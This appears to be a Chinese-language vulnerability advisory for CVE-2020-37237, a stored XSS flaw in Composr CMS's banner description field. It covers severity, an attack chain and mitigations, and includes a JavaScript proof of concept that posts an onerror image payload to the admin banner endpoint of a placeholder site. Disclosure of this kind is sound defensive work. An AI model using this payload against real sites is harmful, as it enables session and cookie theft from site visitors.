CVE-2020-37237 CVSS 6.4 中危

CVE-2020-37237 Composr CMS 存储型XSS漏洞

披露日期: 2026-05-16

来源: [email protected]

漏洞信息

漏洞编号

CVE-2020-37237

漏洞类型

存储型XSS

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Composr CMS

漏洞概述

Composr CMS 10.0.34版本存在持久型跨站脚本（XSS）漏洞。该漏洞源于横幅管理界面的描述字段未对用户输入进行有效过滤。具有管理员权限的攻击者可利用“添加横幅”功能注入恶意脚本载荷。该脚本将在所有访问网站首页的访客浏览器中自动执行，从而造成敏感信息泄露或进一步的攻击行为。

技术细节

该漏洞属于典型的存储型跨站脚本（Stored XSS）。其根本原因在于Composr CMS后台的横幅管理模块在处理用户提交的“描述”数据时，缺乏对HTML标签和JavaScript代码的有效过滤与转义。攻击链始于拥有管理员权限的攻击者登录后台，导航至横幅添加界面。在此处，攻击者可以向“描述”输入框中注入恶意的JavaScript载荷（如<script>标签或事件处理器）。一旦提交，后端将该恶意数据原样存储在数据库中。随后，当任意用户（包括管理员）访问包含该横幅的网站首页时，服务器会从数据库读取数据并直接渲染到HTML页面中。浏览器解析到恶意脚本后立即执行，从而导致攻击者能够窃取受害者的Cookie、会话令牌，或者执行任意客户端操作。

攻击链分析

STEP 1

步骤1：获取权限

攻击者获取Composr CMS的管理员账户凭证，成功登录后台管理系统。

STEP 2

步骤2：注入载荷

攻击者导航至横幅管理界面，在“添加横幅”功能的“描述”字段中输入恶意JavaScript代码并提交。

STEP 3

步骤3：存储数据

后端服务器接收请求，将未经过滤的恶意代码原样存储在数据库的横幅记录中。

STEP 4

步骤4：触发执行

当普通用户或管理员访问网站首页（加载横幅的位置）时，恶意脚本被解析并在浏览器中执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2020-37237: Stored XSS in Composr CMS Banner Description
// Attacker needs valid admin session cookies

var maliciousPayload = "<img src=x onerror=alert('CVE-2020-37237')>";

// Target URL for adding a banner (Admin access required)
var targetUrl = "http://target-site.com/adminzone/index.php?page=admin_banners&type=add";

// Data to be sent in the POST request
var params = "banner_name=TestBanner&description=" + encodeURIComponent(maliciousPayload) + "&submit=1";

// Send request using fetch API (requires valid cookies context)
fetch(targetUrl, {
    method: "POST",
    headers: {
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": "admin_session_cookie_here"
    },
    body: params
})
.then(response => {
    if(response.ok) console.log("Payload injected successfully. Visit homepage to trigger.");
});

影响范围

Composr CMS 10.0.34 及以下版本

防御指南

临时缓解措施

如果不能立即升级，应在Web应用防火墙（WAF）中配置规则，拦截针对横幅管理接口提交的包含<script>或事件处理器的恶意请求。同时，限制管理员账户的使用权限，仅允许信任的人员访问后台。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2020-37237
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2020-37237
3 Details https://www.cvedetails.com/cve/CVE-2020-37237/
4 VulDB https://vuldb.com/cve/CVE-2020-37237
5 Link https://compo.sr/
6 Link https://compo.sr/download.htm
7 Link https://www.exploit-db.com/exploits/49190
8 Link https://www.vulncheck.com/advisories/composr-cms-persistent-cross-site-scripting-via-banners

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表